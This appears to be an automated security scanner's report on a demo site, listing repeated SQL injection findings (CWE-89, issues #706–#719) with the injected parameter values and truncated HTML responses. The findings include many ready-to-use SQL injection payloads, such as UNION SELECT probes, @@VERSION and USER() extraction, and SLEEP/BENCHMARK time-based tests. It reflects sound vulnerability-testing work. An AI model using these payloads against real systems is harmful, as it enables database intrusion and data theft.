<!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #706\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)+CHAR(120)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #707\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89Issue Number #708\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')\n),4,5,6,7,8,9,10,11,12--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #709\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io') or ('x')=('x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #710\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io '''''''''''''UNION SELECT '2\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #711\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #712\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #713\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #714\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #715\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io or pg_SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #716\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #717\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1) or benchmark(10000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #718\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #719Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- 